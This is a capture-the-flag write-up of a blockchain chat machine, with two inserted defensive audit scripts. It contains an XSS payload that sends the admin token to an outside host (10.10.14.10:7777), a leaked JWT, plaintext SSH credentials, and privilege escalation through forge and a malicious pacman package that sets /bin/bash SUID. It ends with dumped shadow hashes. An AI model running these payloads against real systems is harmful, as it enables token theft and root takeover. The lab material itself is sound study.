Basic information

Port scan

22 and 80:

```shell
$ nmap -sC -sV -Pn 10.10.11.43
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-20 13:17 CST
Nmap scan report for 10.10.11.43
Host is up (0.083s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.7 (protocol 2.0)
| ssh-hostkey:
|   256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA)
|_  256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519)
80/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
|_http-title: Home - DBLC

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.42 seconds
```

80

A chat application built on blockchain technology:

Chat

After registering and logging in with any account, you can see messages sent automatically by a bot, a "report user" feature, and the Solidity source:

report user

The only interaction is text input and there is a bot, so the routine check is XSS; the report user feature looks like it may be vulnerable to XSS:

xss

The cookie is HttpOnly, but the info endpoint returns the current user's token, so if the XSS payload makes the bot request the info endpoint first and then sends the response out, the token can be extracted from the response:

```json
{"role":"admin","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczMjA4MDY2MSwianRpIjoiMzk0YzAzYzYtZjAzZC00MWNkLThmNzgtZTE2MjE1Zjc0ZWViIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzMyMDgwNjYxLCJleHAiOjE3MzI2ODU0NjF9.hck4tzbasiabtuy_3ey_2zpKJwRj1g8VfRZw63_KOEc","username":"admin"}
```
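Added example, not from the original writeup: decode the claims of the token above without verifying it and check how long it stays valid. The point for defenders is that HttpOnly only protects the cookie itself; an endpoint that echoes the token in a response body makes it readable to any script running in the page, and a long-lived access token gives a stolen copy a long window of use. The 15-minute limit is an assumed policy value, not something the application states.

```python
import base64
import json
from datetime import datetime, timezone

# Token returned by the info endpoint above (value from the page). Only the
# claims are inspected; the signature is not verified and nothing is granted from it.
ADMIN_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczMjA4MDY2MSwianRpIjoiMzk0YzAzYzYtZjAzZC00MWNkLThmNzgtZTE2MjE1Zjc0ZWViIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzMyMDgwNjYxLCJleHAiOjE3MzI2ODU0NjF9."
    "hck4tzbasiabtuy_3ey_2zpKJwRj1g8VfRZw63_KOEc"
)

# Assumed policy value: access tokens should not live longer than 15 minutes.
MAX_ACCESS_TOKEN_LIFETIME = 15 * 60


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> tuple:
    """Split a JWT into (header, claims) dicts without checking the signature."""
    header_b64, payload_b64, _signature_b64 = token.split(".")
    return (json.loads(_b64url_decode(header_b64)),
            json.loads(_b64url_decode(payload_b64)))


def audit_token_lifetime(token: str, max_lifetime: int = MAX_ACCESS_TOKEN_LIFETIME) -> dict:
    """Summarise who the token is for and how long a stolen copy stays usable."""
    header, claims = decode_jwt_unverified(token)
    lifetime = claims["exp"] - claims["iat"]

    def to_utc(ts: int) -> str:
        return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()

    return {
        "alg": header.get("alg"),
        "sub": claims.get("sub"),
        "type": claims.get("type"),
        "issued_at": to_utc(claims["iat"]),
        "expires_at": to_utc(claims["exp"]),
        "lifetime_seconds": lifetime,
        "too_long_lived": lifetime > max_lifetime,
    }


if __name__ == "__main__":
    print(json.dumps(audit_token_lifetime(ADMIN_TOKEN), indent=2))
```

The token's `exp` minus `iat` is 604800 seconds, i.e. seven days, so once exfiltrated it remains usable for a week unless the server keeps a revocation list keyed on `jti`. Short lifetimes plus refresh tokens, and not returning the token in any API response body, are the two fixes this check points at.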

xss.js

```javascript
fetch('/api/info').then(response => response.text()).then(text => {
  fetch('http://10.10.14.10:7777/log?' + btoa(text), {
    mode: 'no-cors'
  });
});
```

Admin

After replacing the cookie, an extra Admin entry appears:

It can be seen that the application talks to Ethereum over JSON-RPC:

eth_getBlockByNumber

According to the documentation there is an eth_getBlockByNumber method, so start reading blocks from the beginning of the chain:

Decoding the input of the first block yields information related to keira, which looks like a password:

```text
keira
SomedayBitCoinWillCollapse
```
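Added example, not from the original writeup: the same eth_getBlockByNumber walk turned into an audit that flags transactions whose calldata decodes to readable text. The block below is a constructed sample with made-up hashes, addresses and calldata, not the machine's chain. Anything sent in calldata is permanently readable by anyone who can query a node, so this is the check to run against a deployment before credentials end up on-chain the way they did here.

```python
import string

# Constructed sample shaped like the result of eth_getBlockByNumber with
# fullTransactionObjects=True; hashes, addresses and calldata are invented.
SAMPLE_BLOCK = {
    "number": "0x1",
    "hash": "0x" + "ab" * 32,
    "transactions": [
        {   # plain text committed on-chain: readable by anyone who can query the node
            "hash": "0x" + "01" * 32,
            "from": "0x" + "11" * 20,
            "to": None,
            "input": "0x" + "constructed-user:constructed-password".encode().hex(),
        },
        {   # ordinary ABI-encoded call: contains non-ASCII bytes, so it is not reported
            "hash": "0x" + "02" * 32,
            "from": "0x" + "22" * 20,
            "to": "0x" + "33" * 20,
            "input": "0xa9059cbb" + "00" * 64,
        },
        {   # empty calldata (plain value transfer)
            "hash": "0x" + "03" * 32,
            "from": "0x" + "22" * 20,
            "to": "0x" + "44" * 20,
            "input": "0x",
        },
    ],
}

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def build_request(block_number: int, request_id: int = 1) -> dict:
    """JSON-RPC body for eth_getBlockByNumber with full transaction objects."""
    return {
        "jsonrpc": "2.0",
        "method": "eth_getBlockByNumber",
        "params": [hex(block_number), True],
        "id": request_id,
    }


def decode_calldata_text(input_hex: str):
    """Return the calldata as text if every byte is printable ASCII, else None."""
    raw = bytes.fromhex(input_hex[2:] if input_hex.startswith("0x") else input_hex)
    if not raw:
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if all(ch in PRINTABLE for ch in text) else None


def find_plaintext_inputs(block: dict) -> list:
    """List (tx hash, decoded text) for each transaction whose calldata is readable text."""
    hits = []
    for tx in block.get("transactions", []):
        if not isinstance(tx, dict):
            continue  # only hashes are returned when fullTransactionObjects is False
        text = decode_calldata_text(tx.get("input", "0x"))
        if text is not None:
            hits.append((tx["hash"], text))
    return hits


def audit_chain(fetch_block, first: int, last: int) -> list:
    """Walk blocks first..last; fetch_block(request_body) returns the block dict or None."""
    findings = []
    for n in range(first, last + 1):
        block = fetch_block(build_request(n, request_id=n))
        if block:
            findings.extend((n, h, text) for h, text in find_plaintext_inputs(block))
    return findings


if __name__ == "__main__":
    # Offline run against the constructed sample. A real run would POST the body
    # from build_request() to the node's JSON-RPC endpoint and pass back "result".
    fake_node = {1: SAMPLE_BLOCK}
    fetch = lambda body: fake_node.get(int(body["params"][0], 16))
    for blk, tx_hash, text in audit_chain(fetch, 0, 1):
        print(f"block {blk} tx {tx_hash}: {text!r}")
```

The printable-ASCII filter is deliberately simple: real ABI-encoded calls start with a 4-byte selector and are padded with zero bytes, so they fall out, while anything a developer pasted in as a string is flagged for review.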

keira & user flag

These turn out to be the username and password; log in over SSH:

forge

keira can run forge as the paul user; a test run shows it is a tool for debugging smart contracts:

The documentation shows that a solc path can be specified at build time, which lets us run an arbitrary program as paul:

```shell
sudo -u paul /home/paul/.foundry/bin/forge build -h
      --use <SOLC_VERSION>
          Specify the solc version, or a path to a local solc, to build with
```

paul

So create a project and specify the program to run at build time:

```shell
sudo -u paul /home/paul/.foundry/bin/forge init /tmp/miao/test --no-git --offline

sudo -u paul /home/paul/.foundry/bin/forge build --use /tmp/miao/shell.sh
```

Privilege escalation & root flag

paul can run pacman with sudo; pacman is a package manager, so the standard approach is to install a malicious package:

```bash
echo -e "pkgname=miao\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=miao.install" > PKGBUILD
echo "post_install() { chmod +s /bin/bash; }" > miao.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p
```

shadow

```text
root:$y$j9T$aS1WjBeHOMsj5JDGpOSTR0$eEn9e2kIqFfcRCf79xQw7iLDJbt/ioE793tqS3GnjsC:19878::::::
keira:$y$j9T$XXkQ9ogGKlThyrI.mItx80$eMiwlviC0FB/bu5tWtoc.DpedzwUnOwETzmlPf6ZuC8:19878:0:99999:7:::
paul:$y$j9T$milm8la5tGGIhUazNYV3k.$lsAle1Ny3lNaIzStej/8qsKj/1wSgaoi15f/u5Ky/h9:19878:0:99999:7:::
```

References